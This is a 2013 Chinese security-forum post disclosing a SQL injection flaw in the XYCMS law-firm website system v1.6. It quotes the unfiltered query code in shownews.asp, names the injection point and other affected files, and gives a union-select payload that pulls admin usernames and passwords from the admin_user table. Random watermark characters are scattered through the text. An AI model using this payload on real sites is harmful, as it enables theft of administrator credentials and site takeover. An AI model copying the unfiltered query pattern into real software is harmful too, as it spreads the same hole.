找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2161|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似" C( g- I8 m9 y2 g# b
3 u" S/ r0 E& d
淫荡分割线: _, C' A# _  X& E. h
--------------------------------------------------------
4 T& Y- Q0 B8 I; X6 C- {
: e' N" o; h+ j2 Y审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)! P( P  O7 V/ {6 E: C+ J
源码地址:http://down.chinaz.com/soft/29233.htm
6 D% f# w- I+ h" ]$ j% x ! j2 i& v3 Q) U+ W
漏洞文件:shownews.asp
, s" j, w+ i8 |9 p漏洞代码:7-13行
, n/ {7 x- X# |# q
, t/ V8 z3 E+ r
  f( j, H7 A& d% T' ?<% . r" _7 ^$ q4 ]! \
id=request.QueryString("id")
# G* e8 z( j: a6 Q# c& o   
+ p( d3 |# K6 q* X! S  bset snews=server.createobject("adodb.recordset")
3 B  w6 S1 y# c4 Y9 xexec="select * from [news] where id="&id
8 f3 e& H' H8 D$ msnews.open exec,conn,1,1
8 s8 ~; [7 p3 F/ H1 ^9 K7 x* n  b. G%>: J; K! T7 k: B/ D7 _

9 q- ]0 x( _: i6 M8 V6 J$ M
; {% n2 V! d2 n! Q0 W) |: O什么过滤都没有  直造成注入* w/ X; Z2 U* c% O6 T1 E/ c+ j! |

0 {1 \7 u' a! c# j- c1 w$ v6 A# p注入点:http://127.0.0.1:99/shownews.asp?id=xx. p% P* I0 N& F1 u  z

+ o- N. I8 @5 t3 ]4 C其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
3 n% W% t* T0 V3 O% N) S + h. Z- L3 m/ h# m+ y

) L$ p" i; e( j6 ]% iexp: union select 1,admin,password,4,5,7 from admin_user
4 U; ?+ k  e2 N! I2 U5 J: D* r9 }$ b! f% C3 M! N! q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表